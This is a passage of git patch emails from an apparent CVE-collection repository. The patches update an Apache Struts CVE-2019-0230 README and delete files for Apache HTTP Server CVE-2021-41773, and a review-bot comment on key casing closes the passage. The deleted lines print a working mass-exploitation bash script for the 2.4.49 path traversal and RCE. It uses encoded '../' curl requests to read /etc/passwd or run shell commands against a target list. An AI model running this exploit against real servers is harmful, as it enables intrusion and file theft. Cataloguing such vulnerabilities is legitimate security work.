insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From fd548d6425354757b72e5af8f2823ad1ee49b8d7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:55:25 +0000 Subject: [PATCH 51/54] update cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 28 ++++++++----------- 1 file changed, 12 insertions(+), 16 deletions(-) 
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index 827fdd49..c456e869 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -5,21 +5,17 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2019-0230 Credits: Ash Daulton and the cPanel Security Team -``` -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -``` # Usage -``` -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami -``` +''' +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html -- Gitee From 336043f0e73a79a956d2a126f1e33dbdd8eb5617 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:55:51 +0000 Subject: [PATCH 52/54] update cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- cve/apache-Struts/2019/CVE-2019-0230/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index c456e869..170d45b5 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md 
@@ -3,15 +3,16 @@ Exploit Author: Lucas Souza https://lsass.io Vendor Homepage: https://apache.org/ Version: 2.4.49 Tested on: 2.4.49 -CVE : CVE-2019-0230 +CVE : CVE-2019-0230 Credits: Ash Daulton and the cPanel Security Team # Usage -''' +``` python CVE-2019-0230.py + -target : Target address -command : Command to execute -debug : Enable debugging -proxy : Enable proxy +``` # reference http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -- Gitee From 3c6489707b27d9f75d6432708511c3fc3618728b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:56:15 +0000 Subject: [PATCH 53/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2019/CVE-2021-41773/CVE-2021-41773.sh | 22 --------------- .../2019/CVE-2021-41773/README.md | 27 ------------------- .../2019/yaml/CVE-2021-41773.yaml | 27 ------------------- 3 files changed, 76 deletions(-) delete mode 100644 cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh delete mode 100644 cve/apache-HTTP Server/2019/CVE-2021-41773/README.md delete mode 100644 cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml diff --git a/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh deleted file mode 100644 index 2546e270..00000000 --- a/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh +++ /dev/null 
@@ -1,22 +0,0 @@ -# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -# Date: 10/05/2021 -# Exploit Author: Lucas Souza https://lsass.io -# Vendor Homepage: https://apache.org/ -# Version: 2.4.49 -# Tested on: 2.4.49 -# CVE : CVE-2021-41773 -# Credits: Ash Daulton and the cPanel Security Team - -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done - -# PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file diff --git a/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md deleted file mode 100644 index d4d61313..00000000 --- a/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md +++ /dev/null @@ -1,27 +0,0 @@ -# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Date: 10/05/2021 -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2021-41773 -Credits: Ash Daulton and the cPanel Security Team -``` -#!/bin/bash - -if [[ $1 == '' ]]; [[ $2 == '' ]]; then -echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] -echo ./PoC.sh targets.txt /etc/passwd -exit -fi -for host in $(cat $1); do -echo $host -curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -``` -# Usage -``` -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami -``` - 
diff --git a/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml deleted file mode 100644 index 420c8e1a..00000000 --- a/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-41773 -source: https://www.exploit-db.com/exploits/50383 -info: - name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。 - severity: critical - description: - 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 - scope-of-influence: - Apache HTTP Server = 2.4.49 - reference: - - https://apache.org/ - - https://www.exploit-db.com/exploits/50383 - - https://blog.csdn.net/qq_48985780/article/details/120973100 - - https://www.oracle.com/security-alerts/cpujan2022.html - - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html - - http://www.openwall.com/lists/oss-security/2021/10/08/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - cnvd-id: None - kve-id: None - tags: - - Apache HTTP Serve - - 路径穿越 - - 任意文件读取 -- Gitee From 1ebf5c5055a0e651ca7fe7ba75b1ffcf394ab8be Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 08:27:43 +0000 Subject: [PATCH 54/54] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..1f85da68 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -18,6 +18,8 @@ cve: - CVE-2022-33891 apache-tomcat: - CVE-2020-13935 + apache-Struts: + - CVE-2019-0230 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee
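Review bot: The new key `apache-Struts` is mixed-case while the neighbouring keys in this hunk (`apache-tomcat`, `linux-kernel`) are all lowercase, so anything that looks products up by a normalized name will not find it; `apache-struts:` would match the existing convention. If the key has to mirror the directory created earlier in this series (`cve/apache-Struts`), the directory should be renamed to lowercase in the same change so the two stay consistent.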